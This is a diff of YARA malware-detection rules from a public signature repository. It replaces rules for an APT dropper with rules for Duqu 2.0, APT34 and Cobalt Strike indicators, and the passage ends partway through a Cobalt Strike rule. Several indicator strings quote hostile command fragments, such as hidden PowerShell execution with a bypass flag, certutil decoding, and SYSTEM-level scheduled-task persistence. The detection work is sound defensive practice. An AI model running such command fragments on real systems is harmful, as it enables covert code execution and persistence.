+		id = "22db52c2-18e7-537e-a9c5-38ccfd3a0d30"
+		date = "2015-06-09"
 		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L1-L29"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L10-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "af98ab901ca97a350aa837779d74208a780b1099e113cfa59bee2eb33690918e"
+		logic_hash = "79f205745e61b55c43c239d9da9086fd72312ea2741351183d32f7c227174ff8"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
-		$file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
-		$file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
-		$file4 = "\\Microsoft\\Internet Explorer\\main.dll"
-		$file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
-		$file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
-		$file7 = "\\Microsoft\\Internet Explorer\\mon"
-		$file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
+		$a1 = "{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
+		$a2 = "\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
+		$a4 = "\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide
+		$a5 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide
+		$a8 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide
+		$a9 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide
+		$a7 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide
+		$b1 = "MSI.dll"
+		$b2 = "msi.dll"
+		$b3 = "StartAction"
+		$c1 = "msisvc_32@" wide
+		$c2 = "PROP=" wide
+		$c3 = "-Embedding" wide
+		$c4 = "S:(ML;;NW;;;LW)" wide
+		$d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase
+		$d2 = {2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 40 40 40 73 74 64 40 40}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 3 of ( $file* )
+		(( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) ) and filesize < 100000 ) or ( ( uint32( 0 ) == 0xe011cfd0 ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) or ( any of ( $d* ) ) ) and filesize < 20000000 )
 }
-rule SIGNATURE_BASE_Dubseven_Dropper_Registry_Checks : FILE
+rule SIGNATURE_BASE_APT_Apt_Duqu2_Drivers : FILE
 {
 	meta:
-		description = "Searches for registry keys checked for by the dropper"
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "8369cdbb-53b8-5dc5-9181-fd49747042a7"
-		date = "2016-04-18"
+		description = "Rule to detect Duqu 2.0 drivers"
+		author = "Kaspersky Lab"
+		id = "714d5151-9f80-582e-a628-1de9d83a072d"
+		date = "2015-06-09"
 		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L31-L57"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L40-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "813ff641a4213cf9d56013768e284e7f622a223c6c4f585c3bbbcf69fc03723c"
+		logic_hash = "023a51408f86814a8f810d0f89b185aca07dd60a1abb6de47f86ad8eeda4c4c4"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$reg1 = "SOFTWARE\\360Safe\\Liveup"
-		$reg2 = "Software\\360safe"
-		$reg3 = "SOFTWARE\\kingsoft\\Antivirus"
-		$reg4 = "SOFTWARE\\Avira\\Avira Destop"
-		$reg5 = "SOFTWARE\\rising\\RAV"
-		$reg6 = "SOFTWARE\\JiangMin"
-		$reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
+		$a1 = "\\DosDevices\\port_optimizer" wide nocase
+		$a2 = "romanian.antihacker"
+		$a3 = "PortOptimizerTermSrv" wide
+		$a4 = "ugly.gorilla1"
+		$b1 = "NdisIMCopySendCompletePerPacketInfo"
+		$b2 = "NdisReEnumerateProtocolBindings"
+		$b3 = "NdisOpenProtocolConfiguration"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of ( $reg* )
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 2 of ( $b* ) ) and filesize < 100000
 }
-rule SIGNATURE_BASE_Dubseven_Dropper_Dialog_Remains : FILE
+rule SIGNATURE_BASE_Duqu2_Generic1 : FILE
 {
 	meta:
-		description = "Searches for related dialog remnants. How rude."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "6029ea74-26fc-57d1-aaed-be1ea2138844"
-		date = "2016-04-18"
+		description = "Kaspersky APT Report - Duqu2 Sample - Generic Rule"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0e03eda5-d65b-5400-aceb-bc37559d9a6e"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L59-L80"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L61-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "322ddc1210b6bde393970c61113e6efcb87a3529db386323dfd08973e5d2703e"
+		logic_hash = "742934198391bd30da654bf8efedc2a18c58dd0de357b2bcdbdbe8066187b0c2"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3f9168facb13429105a749d35569d1e91465d313"
+		hash1 = "0a574234615fb2382d85cd6d1a250d6c437afecc"
+		hash2 = "38447ed1d5e3454fe17699f86c0039f30cc64cde"
+		hash3 = "5282d073ee1b3f6ce32222ccc2f6066e2ca9c172"
+		hash4 = "edfca3f0196788f7fde22bd92a8817a957c10c52"
+		hash5 = "6a4ffa6ca4d6fde8a30b6c8739785f4bd2b5c415"
+		hash6 = "00170bf9983e70e8dd4f7afe3a92ce1d12664467"
+		hash7 = "32f8689fd18c723339414618817edec6239b18f3"
+		hash8 = "f860acec9920bc009a1ad5991f3d5871c2613672"
+		hash9 = "413ba509e41c526373f991d1244bc7c7637d3e13"
+		hash10 = "29cd99a9b6d11a09615b3f9ef63f1f3cffe7ead8"
+		hash11 = "dfe1cb775719b529138e054e7246717304db00b1"
 
 	strings:
-		$dia1 = "fuckMessageBox 1.0" wide
-		$dia2 = "Rundll 1.0" wide
+		$s0 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" fullword wide
+		$s1 = "SetSecurityDescriptorSacl" fullword ascii
+		$s2 = "msisvc_32@" fullword wide
+		$s3 = "CompareStringA" fullword ascii
+		$s4 = "GetCommandLineW" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_Maindll_Mutex : FILE
+rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Procexp : FILE
 {
 	meta:
-		description = "Matches on the maindll mutex"
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "7a89dae3-9e03-5803-9729-78e6e65e91d3"
-		date = "2016-04-18"
+		description = "Kaspersky APT Report - Duqu2 Sample - Malicious MSI"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d7fd48d5-2416-5eff-a751-ece09ce27767"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L83-L103"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L92-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8d3311164104198e02e700c2e9a5293e55d75d63b39c75c4e375b7f35eb5fde4"
+		logic_hash = "dd63f0eebc88fa0737905f20dc30dc968df81b7976a86ed8ed5646f7708c4b4a"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2422835716066b6bcecb045ddd4f1fbc9486667a"
+		hash2 = "b120620b5d82b05fee2c2153ceaf305807fa9f79"
+		hash3 = "288ebfe21a71f83b5575dfcc92242579fb13910d"
 
 	strings:
-		$mutex = "h31415927tttt"
+		$x1 = "svcmsi_32.dll" fullword wide
+		$x2 = "msi3_32.dll" fullword wide
+		$x3 = "msi4_32.dll" fullword wide
+		$x4 = "MSI.dll" fullword ascii
+		$s1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
+		$s2 = "Sysinternals installer" fullword wide
+		$s3 = "Process Explorer" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) ) and ( all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Slserver_Dialog_Remains : FILE
+rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Samsungprint : FILE
 {
 	meta:
-		description = "Searches for related dialog remnants."
-		author = "Matt Brooks, @cmatthewbrooks / modified by Florian Roth"
-		id = "cf199d25-ce5e-52c2-88de-32a48dee4c6f"
-		date = "2016-04-18"
+		description = "Kaspersky APT Report - Duqu2 Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc4bc00e-f38b-577f-8f00-637c0549894c"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L106-L136"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L116-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b18f4a6c54b456ae697e9639e8c3041fd4f3141d89850c3e1d3d4e220c3cea3"
+		hash = "ce39f41eb4506805efca7993d3b0b506ab6776ca"
+		logic_hash = "9b2d80cfe3c47ac315b76c773acc3290668e06e4bbd99402e203b72af593fab8"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$slserver = "SLServer" wide fullword
-		$fp1 = "Dell Inc." wide fullword
-		$fp2 = "ScriptLogic Corporation" wide
-		$extra1 = "SLSERVER" wide fullword
-		$extra2 = "\\SLServer.pdb" ascii
+		$s0 = "Installer for printer drivers and applications" fullword wide
+		$s1 = "msi4_32.dll" fullword wide
+		$s2 = "HASHVAL" fullword wide
+		$s3 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
+		$s4 = "ca.dll" fullword ascii
+		$s5 = "Samsung Electronics Co., Ltd." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and not 1 of ( $fp* ) and 1 of ( $extra* ) and $slserver
+		uint16( 0 ) == 0x5a4d and filesize < 82KB and all of them
 }
-rule SIGNATURE_BASE_Slserver_Mutex : FILE
+rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Msi3_32 : FILE
 {
 	meta:
-		description = "Searches for the mutex."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "decdefd0-fe20-5adf-9d8c-0e2b954481a0"
-		date = "2016-04-18"
+		description = "Kaspersky APT Report - Duqu2 Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6cbea2e7-f406-57cf-b9c8-9d84b1480035"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L138-L158"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_kaspersky_duqu2.yar#L136-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9bf3c6c93e77424463e3fb6f9f4d58e80254866462fe1287293b0a357737da20"
+		hash = "53d9ef9e0267f10cc10f78331a9e491b3211046b"
+		logic_hash = "718223d1ff82ffa0f3204e0cdaf0d441ed133f1f069d9ba2eb818bd3445f63ca"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$mutex = "M&GX^DSF&DA@F"
+		$s0 = "ProcessUserAccounts" fullword ascii
+		$s1 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
+		$s2 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
+		$s3 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
+		$s4 = "msi3_32.dll" fullword wide
+		$s5 = "RunDLL" fullword ascii
+		$s6 = "MSI Custom Action v3" fullword wide
+		$s7 = "msi3_32" fullword wide
+		$s8 = "Operating System" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
+		uint16( 0 ) == 0x5a4d and filesize < 72KB and all of them
 }
-rule SIGNATURE_BASE_Slserver_Command_And_Control : FILE
+rule SIGNATURE_BASE_Mywscript_Compiledscript : FILE
 {
 	meta:
-		description = "Searches for the C2 server."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "e4fcda6c-1c9f-5b58-8b07-8d1a0dc4eaf6"
-		date = "2016-04-18"
+		description = "Detects a scripte with default name Mywscript compiled with Script2Exe (can also be a McAfee tool https://community.mcafee.com/docs/DOC-4124)"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a0480a8a-5a7e-5829-851b-7301cfc9da60"
+		date = "2017-07-27"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L160-L180"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mywscript_dropper.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "48a13d27b7dc9a7f3a65752142b2a291e7c3ee93ef67b36aa4202d065e74d80e"
-		score = 75
+		logic_hash = "5619de9589e3d34026bf4ec223f2c6b94fcb7362c8f3c26f7582030cfc4385cf"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "515f5188ba6d039b8c38f60d3d868fa9c9726e144f593066490c7c97bf5090c8"
 
 	strings:
-		$c2 = "safetyssl.security-centers.com"
+		$x1 = "C:\\Projets\\vbsedit_source\\script2exe\\Release\\mywscript.pdb" fullword ascii
+		$s1 = "mywscript2" fullword wide
+		$s2 = "MYWSCRIPT2" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $c2
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_Slserver_Campaign_Code : FILE
+rule SIGNATURE_BASE_APT34_Malware_HTA : FILE
 {
 	meta:
-		description = "Searches for the related campaign code."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "672f506e-0cc1-5b09-873b-c3d206486bac"
-		date = "2016-04-18"
+		description = "Detects APT 34 malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "683faded-7e4b-5b2f-9f85-300db96ed9d1"
+		date = "2017-12-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L182-L202"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt34.yar#L12-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fbf53678399b0e14eae6f1bb6594b2aa665f76f10388e492bec2f9101a4dd4b1"
+		logic_hash = "0bf9b988b3ef46df29e0f91c3ea186aaab8a1ccb79563e97521311bf2e1215d7"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f6fa94cc8efea0dbd7d4d4ca4cf85ac6da97ee5cf0c59d16a6aafccd2b9d8b9a"
 
 	strings:
-		$campaign = "wthkdoc0106"
+		$x1 = "WshShell.run \"cmd.exe /C C:\\ProgramData\\" ascii
+		$x2 = ".bat&ping 127.0.0.1 -n 6 > nul&wscript  /b" ascii
+		$x3 = "cmd.exe /C certutil -f  -decode C:\\ProgramData\\" ascii
+		$x4 = "a.WriteLine(\"set Shell0 = CreateObject(" ascii
+		$x5 = "& vbCrLf & \"Shell0.run" ascii
+		$s1 = "<title>Blog.tkacprow.pl: HTA Hello World!</title>" fullword ascii
+		$s2 = "<body onload=\"test()\">" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $campaign
+		filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Slserver_Unknown_String : FILE
+rule SIGNATURE_BASE_APT34_Malware_Exeruner : FILE
 {
 	meta:
-		description = "Searches for a unique string."
-		author = "Matt Brooks, @cmatthewbrooks"
-		id = "00341604-480f-59aa-9c18-009e7b53928e"
-		date = "2016-04-18"
+		description = "Detects APT 34 malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8ddfa59d-9b8a-5cb6-a992-6498ac9be75d"
+		date = "2017-12-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L204-L224"
+		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt34.yar#L34-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "18d3bb236282c506c161949883722da1cb0af6dd87bf5cb3d4a5b3d90f4a7db0"
+		logic_hash = "71840d9a0f8a5dc39656e6bf1ad94fa275bcd18baf6b374dfe040c161d62a960"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c75c85acf0e0092d688a605778425ba4cb2a57878925eee3dc0f4dd8d636a27a"
 
 	strings:
-		$string = "test-b7fa835a39"
+		$x1 = "\\obj\\Debug\\exeruner.pdb" ascii
+		$x2 = "\"wscript.shell`\")`nShell0.run" wide
+		$x3 = "powershell.exe -exec bypass -enc \" + ${global:$http_ag} +" wide
+		$x4 = "/c powershell -exec bypass -window hidden -nologo -command " fullword wide
+		$x5 = "\\UpdateTasks\\JavaUpdatesTasksHosts\\" wide
+		$x6 = "schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn" wide
+		$x7 = "UpdateChecker.ps1 & ping 127.0.0.1" wide
+		$s8 = "exeruner.exe" fullword wide
+		$s9 = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";" fullword wide
+		$s10 = "C:\\ProgramData\\Windows\\Microsoft\\java" fullword wide
+		$s11 = "function runByVBS" fullword wide
+		$s12 = "$84e31856-683b-41c0-81dd-a02d8b795026" fullword ascii
+		$s13 = "${global:$dns_ag} = \"aQBmACAAKAAoAEcAZQB0AC0AVwBtAGk" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $string
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Brooxml_Hunting : HUNTING FILE
+rule SIGNATURE_BASE_Cobaltstrike_C2_Host_Indicator : FILE
 {
 	meta:
-		description = "Detects Microsoft OOXML files with prepended data/manipulated header"
-		author = "Proofpoint"
-		id = "1ffea1c7-9f97-5bb1-93d7-ce914765416f"
-		date = "2024-11-27"
-		modified = "2024-12-12"
-		reference = "https://x.com/threatinsight/status/1861817946508763480"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_brooxml_dec24.yar#L2-L39"
+		description = "Detects CobaltStrike C2 host artifacts"
+		author = "yara@s3c.za.net"
+		id = "7f15ee30-664e-59b8-9e31-35d88e58a45e"
+		date = "2019-08-16"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L1-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "89da6056adbae6155e682b84b950db84e3aedbb9ae693118e6e09d9ed67b03dd"
-		score = 70
-		quality = 58
-		tags = "HUNTING, FILE"
-		category = "hunting"
+		logic_hash = "4761e282e9473ba665a597894ed514d057309703a7d5b4e462ef0e779bbb8c39"
+		score = 60
+		quality = 65
+		tags = "FILE"
 
 	strings:
-		$pk_ooxml_magic = {50 4b 03 04 [22] 13 00 [2] 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c}
-		$pk_0102 = {50 4b 01 02}
-		$pk_0304 = {50 4b 03 04}
-		$pk_0506 = {50 4b 05 06}
-		$pk_0708 = {50 4b 07 08}
-		$word = "word/"
-		$ole = {d0 cf 11 e0}
-		$mz = {4d 5a}
-		$tef = {78 9f 3e 22}
+		$c2_indicator_fp = "#Host: %s"
+		$c2_indicator = "#Host:"
 
 	condition:
-		$pk_ooxml_magic in ( 4 .. 16384 ) and $pk_0506 in ( 16384 .. filesize ) and #pk_0506 == 1 and #pk_0102 > 2 and #pk_0304 > 2 and $word and not ( $pk_0102 at 0 ) and not ( $pk_0304 at 0 ) and not ( $pk_0506 at 0 ) and not ( $pk_0708 at 0 ) and not ( $ole at 0 ) and not ( $mz at 0 ) and not ( $tef at 0 )
+		$c2_indicator and not $c2_indicator_fp and not uint32( 0 ) == 0x0a786564 and not uint32( 0 ) == 0x0a796564
 }
-rule SIGNATURE_BASE_Brooxml_Phishing : PHISHING
+rule SIGNATURE_BASE_Cobaltstrike_Sleep_Decoder_Indicator
 {
 	meta:
-		description = "Detects PDF and OOXML files leading to AiTM phishing"
-		author = "Proofpoint"
-		id = "ccd8ab30-90a4-5d4b-8a77-dbc4669bdb95"
-		date = "2024-11-27"
-		modified = "2024-12-12"
-		reference = "https://x.com/threatinsight/status/1861817946508763480"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_brooxml_dec24.yar#L41-L56"
+		description = "Detects CobaltStrike sleep_mask decoder"
+		author = "yara@s3c.za.net"
+		id = "d5b53d68-55f9-5837-9b0c-e7be2f3bd072"
+		date = "2021-07-19"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L16-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5cc7bc1383e1ded8e8613cbb4fad003e35b67059ca70d33f29406a5c146a5464"
-		score = 65
-		quality = 31
-		tags = "PHISHING"
-		category = "phishing"
+		logic_hash = "f3243c326df18edbd15c2d9120379588e61709efb9295b9584c0565c04ee38a5"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$hex1 = { 21 20 03 20 c3 be c3 bf 09 20 [0-1] 06 20 20 20 20 20 20 20 20 20 20 20 01 20 20 20 06 20 20 20 20 20 20 20 20 10 20 20 05 20 20 20 01 20 20 20 c3 be c3 bf c3 bf c3 bf }
-		$docx = { 50 4b }
-		$pdf = { 25 50 44 46 2d }
+		$sleep_decoder = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 }
+
+	condition:
+		$sleep_decoder
+}
+rule SIGNATURE_BASE_Cobaltstrike_C2_Encoded_XOR_Config_Indicator
+{
+	meta:
+		description = "Detects CobaltStrike C2 encoded profile configuration"
+		author = "yara@s3c.za.net"
+		id = "8e33c63d-eaba-5851-88f4-ef7261a0a618"
+		date = "2021-07-08"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cobaltstrike_evasive.yar#L28-L295"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "6b25ee9064e925c183ef7599c95ecffce48c7f96eea714fa5f6441b21716277e"
+		score = 75
+		quality = 60
+		tags = ""
+
+	strings:
+		$s000 = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? 00 03 00 02 00 04 ?? ?? ?? ?? 00 04 00 02 00 04 ?? ?? ?? ?? 00 05 00 01 00 02 ?? ?? }
+		$s001 = { 01 00 01 00 01 03 ?? ?? 01 03 01 00 01 03 ?? ?? 01 02 01 03 01 05 ?? ?? ?? ?? 01 05 01 03 01 05 ?? ?? ?? ?? 01 04 01 00 01 03 ?? ?? }
+		$s002 = { 02 03 02 03 02 00 ?? ?? 02 00 02 03 02 00 ?? ?? 02 01 02 00 02 06 ?? ?? ?? ?? 02 06 02 00 02 06 ?? ?? ?? ?? 02 07 02 03 02 00 ?? ?? }
+		$s003 = { 03 02 03 02 03 01 ?? ?? 03 01 03 02 03 01 ?? ?? 03 00 03 01 03 07 ?? ?? ?? ?? 03 07 03 01 03 07 ?? ?? ?? ?? 03 06 03 02 03 01 ?? ?? }
+		$s004 = { 04 05 04 05 04 06 ?? ?? 04 06 04 05 04 06 ?? ?? 04 07 04 06 04 00 ?? ?? ?? ?? 04 00 04 06 04 00 ?? ?? ?? ?? 04 01 04 05 04 06 ?? ?? }
+		$s005 = { 05 04 05 04 05 07 ?? ?? 05 07 05 04 05 07 ?? ?? 05 06 05 07 05 01 ?? ?? ?? ?? 05 01 05 07 05 01 ?? ?? ?? ?? 05 00 05 04 05 07 ?? ?? }
+		$s006 = { 06 07 06 07 06 04 ?? ?? 06 04 06 07 06 04 ?? ?? 06 05 06 04 06 02 ?? ?? ?? ?? 06 02 06 04 06 02 ?? ?? ?? ?? 06 03 06 07 06 04 ?? ?? }
+		$s007 = { 07 06 07 06 07 05 ?? ?? 07 05 07 06 07 05 ?? ?? 07 04 07 05 07 03 ?? ?? ?? ?? 07 03 07 05 07 03 ?? ?? ?? ?? 07 02 07 06 07 05 ?? ?? }
